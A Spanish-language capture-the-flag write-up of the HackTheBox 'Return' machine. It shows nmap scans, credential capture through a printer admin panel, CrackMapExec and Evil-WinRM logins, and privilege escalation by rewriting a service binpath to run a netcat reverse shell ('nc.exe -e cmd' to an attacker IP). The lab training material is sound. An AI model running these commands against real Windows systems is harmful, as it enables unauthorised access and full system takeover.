🟢Return

Return es una caja de dificultad fácil basada en impresoras de la plataforma HackTheBox. Esta vez abusaremos del panel de administración web de una impresora para obtener las credenciales de SMB, que también se pueden usar para WinRM. La cuenta está en el grupo Server Operators, lo que le permite modificar, iniciar y detener servicios. Abusaré de esto para obtener un shell como System.

Reconocimiento

NMAP

Comenzamos enumerando los servicios abiertos que tiene la máquina.

sudo nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.11.108

Una vez realizado un escaneo rápido de los servicios abiertos, volvemos a hacer otro escaneo más profundo de los servicios abiertos.

sudo nmap -p80,88,389,593,636,3268,5985,9389,47001,49664,49666,49667,49671,49674,49675,49679,49682,49694 -sV -vv 10.10.11.108

La conclusión principal es que se trata de una máquina con Windows que se encuentra dentro de un dominio de Active Directory .

Ya tenemos versiones de los servicios abiertos y el nombre de un dominio. Vamos a registrarlo en el archivo /etc/hosts.

RECONOCIMIENTO WEB

Tenemos abierto el puerto 80 que está ejecutando un servidor web Microsoft IIS, así que vamos a verificar su contenido.

Los únicos enlaces que funcionan son las páginas de Inicio y Configuración. Vamos a la página de Configuración, a ver su contenido.

Muestra lo que parece ser una página de configuración para una impresora. Nos dan un nombre de un usuario de svc-printer pero no su contraseña.

La contraseña está codificada, pero tenemos la capacidad de cambiar la dirección del servidor. Vamos a capturar la contraseña dirigiendo la dirección del servidor a un oyente nc.

Tenemos una contraseña 1edFg43012!!

ENUMERACIÓN SMB

Como tenemos nombre de usuario y contraseña, vamos a comprobar si tenemos acceso a SMB. Esto podemos comprobarlo con CrackMapExec.

crackmapexec smb 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Vamos a comprobar también si tenemos acceso mediante WinRM.

crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'

También tenemos acceso mediante el protocolo WinRM. *Necesario tener abierto el puerto 5985.

Vamos a acceder a la máquina objetivo aprovechando que está disponible el protocolo WinRM, y tenemos las credenciales.

Acceso mediante usuario svc-printer

Vamos a utilizar Evil-WinRM para entablar una shell revresa utilizando las credenciales obtenidas y el protocolo WinRM.

evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Vamos a por la flag user.txt

Elevación de privilegios

Vamos a ver que privilegios tiene este usuario.

Comprobamos también a que grupos pertenece el usuario svc-printer.

Somos parte del grupo de Server Operators, lo que significa que tenemos control sobre los servicios que se ejecutan dentro de la máquina.

Este usuario puede modificar, iniciar y detener servicios. Si logramos editar un servicio y hacer que ejecute un netcat para nuestro oyente, obtendremos un shell como ntauthority\system.

Así que vamos a empezar cargando el nc.exe en C:\Windows\Temp:

A continuación creamos el servicio que podemos detener e iniciar para ejecutarlo.

sc.exe config VMTools binpath="C:\Windows\Temp>nc.exe -e cmd 10.10.16.1 4444"

A continuación, vamos a detener y reiniciar el servicio.

Al mismo tiempo, pondremos a la escucha un oyente en el puerto 4444.

Próxima parada, buscar la flag root.txt

*Ojo al tiempo para buscar la flag root, el servicio se desconecta al par de minutos de iniciar.

Esto sería todo. Tenemos resuelta la máquina CTF Return de Hack The Box.